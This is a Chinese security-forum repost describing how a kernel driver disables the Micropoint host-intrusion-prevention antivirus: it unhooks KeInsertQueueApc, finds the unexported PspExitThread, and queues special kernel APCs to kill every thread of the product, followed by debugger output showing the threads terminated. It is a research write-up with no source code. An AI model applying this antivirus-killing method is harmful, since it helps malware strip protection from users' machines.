点饭的百度空间
银牌会员
积分 2315
发帖 2236
注册 2007-11-30
|
#1 [dplayer]玩玩微点——APCKILL
标 题: 玩玩微点——APCKILL
作 者: dplayer
时 间: 2009-09-08,09:12
链 接: http://bbs.pediy.com/showthread.php?t=97353
最近学习了APC相关的一些知识 (汗!古老到牛们都可能忘记了它的存在~_~),发现special kernal apc还是能做些事情,比如结束某个进程(嘿嘿^_^),当然是在R0了, “不要问我都能加载驱动了,什么不能干?因为我太TMD能**了,呸”某大牛的话,同样适用于本贴!-_-
选择微点做试验,并非偶然。微点主动防御软件是目前主防中的牛B者,她太X了,真正达到HOOK无极限,搞定她,能学到一些XX技巧。貌似网上流行的ARK软件和进程查杀软件不能直接结束她。(要是很容易放倒,也许就不会有太多人玩儿她了。。嘿嘿^_^!)
预备知识:PE结构;EPROCESS 、ETHREAD结构及获取方法;APC相关知识(俺学习总结的文档会放后面,愿与大伙交流学习)。
看点:EAT HOOK 恢复方法;special kernal apc使用方法;获取内核未导出函数地址方法。
基本流程:
1.恢复KeInsertQueueApc的EAT HOOK;
2.暴搜进程获取微点进程,根据微点进程枚举所有线程;
3.通过PsTerminateSystemThread函数查找到PspTerminateThreadByPointer,通过PspTerminateThreadByPointer找到PspExitThread,编写APC例程,例程内直接调用搜到的PspExitThread函数-_-;
4.调用已恢复KeInsertQueueApc对所有微点线程插APC;
5. 加载驱动,看着最新版免费试用90天的微点主防在XP SP2平台上消失。
附注:
代码写得很乱,想到哪写到哪。如果在阅读代码时出现不适切勿找偶!正常情况加载驱动,微点退出,如出现BSOD等现象,切勿找偶!
以下为俺机子上加载驱动后,windbg输出信息:
baseadress:400000
the functionName = KeInsertQueueApc
the functionaddress=0x0040E411
the functionrav =0x0000E411
the modulefullname is \WINDOWS\system32\ntoskrnl.exe
the database is 0x804D8000
the functionName = KeInsertQueueApc
the functionaddress=0xF9847B80
the functionrav =0x7936FB80
the hook address at 0x7936fb80
the pkeinsertqueueapc is 0x804e6411the keinsertqueueapc is 0xf9847b80restore the hook address at 0x0000e411
the Thread is 0x81CEBAD0
the Thread 0x81cebad0 is Terminated.
the Thread is 0x81CFBAE0
the Thread 0x81cfbae0 is Terminated.
the Thread is 0x81D2E8E8
the Thread 0x81d2e8e8 is Terminated.
the Thread is 0x81C35DA8
the Thread 0x81c35da8 is Terminated.
the Thread is 0x81C14DA8
the Thread 0x81c14da8 is Terminated.
the Thread is 0x81E23B30
the Thread 0x81e23b30 is Terminated.
the Thread is 0x81E4D9E8
the Thread 0x81e4d9e8 is Terminated.
the Thread is 0x81E444E0
the Thread 0x81e444e0 is Terminated.
the Thread is 0x81E23770
the Thread 0x81e23770 is Terminated.
the Thread is 0x81E234F8
the Thread 0x81e234f8 is Terminated.
the Thread is 0x81DCA348
the Thread 0x81dca348 is Terminated.
the Thread is 0x81D93598
the Thread 0x81d93598 is Terminated.
the Thread is 0x81C6E020
the Thread 0x81c6e020 is Terminated.
the Thread is 0x81C6ED20
the Thread 0x81c6ed20 is Terminated.
the Thread is 0x81BB0020
the Thread 0x81bb0020 is Terminated.
the Thread is 0x81BB0320
the Thread 0x81bb0320 is Terminated.
the Thread is 0x81C6A020
the Thread 0x81c6a020 is Terminated.
the Thread is 0x81E41DA8
the Thread 0x81e41da8 is Terminated.
the Thread is 0x81E3F450
the Thread 0x81e3f450 is Terminated.
the Thread is 0x81E3EB38
the Thread 0x81e3eb38 is Terminated.
the Thread is 0x81E3E8C0
the Thread 0x81e3e8c0 is Terminated.
the Thread is 0x81E3E510
the Thread 0x81e3e510 is Terminated.
the Thread is 0x81E3DB38
the Thread 0x81e3db38 is Terminated.
the Thread is 0x81E3D8C0
the Thread 0x81e3d8c0 is Terminated.
the Thread is 0x81E3D648
the Thread 0x81e3d648 is Terminated.
the Thread is 0x81E3A258
the Thread 0x81e3a258 is Terminated.
the Thread is 0x81E39020
the Thread 0x81e39020 is Terminated.
the Thread is 0x81E39DA8
the Thread 0x81e39da8 is Terminated.
the Thread is 0x81E39AD0
the Thread 0x81e39ad0 is Terminated.
the Thread is 0x81E38020
the Thread 0x81e38020 is Terminated.
the Thread is 0x81E383A0
the Thread 0x81e383a0 is Terminated.
the Thread is 0x81E37020
the Thread 0x81e37020 is Terminated.
the Thread is 0x81E37DA8
the Thread 0x81e37da8 is Terminated.
the Thread is 0x81E36C08
the Thread 0x81e36c08 is Terminated.
the Thread is 0x81E364D8
the Thread 0x81e364d8 is Terminated.
the Thread is 0x81E355B0
the Thread 0x81e355b0 is Terminated.
the Thread is 0x81E2C020
the Thread 0x81e2c020 is Terminated.
the Thread is 0x81E2CD88
the Thread 0x81e2cd88 is Terminated.
the Thread is 0x81E2C918
the Thread 0x81e2c918 is Terminated.
the Thread is 0x81E23020
the Thread 0x81e23020 is Terminated.
the Thread is 0x81E23DA8
the Thread 0x81e23da8 is Terminated.
the Thread is 0x81E18560
the Thread 0x81e18560 is Terminated.
the Thread is 0x81D91950
the Thread 0x81d91950 is Terminated.
the Thread is 0x81D6C020
the Thread 0x81d6c020 is Terminated.
the Thread is 0x81D5BDA8
the Thread 0x81d5bda8 is Terminated.
| |
※ ※ ※ 本文纯属【点饭的百度空间】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
你的微笑 is 微点的骄傲!
http://hi.baidu.com/new/micropoint |
|
|
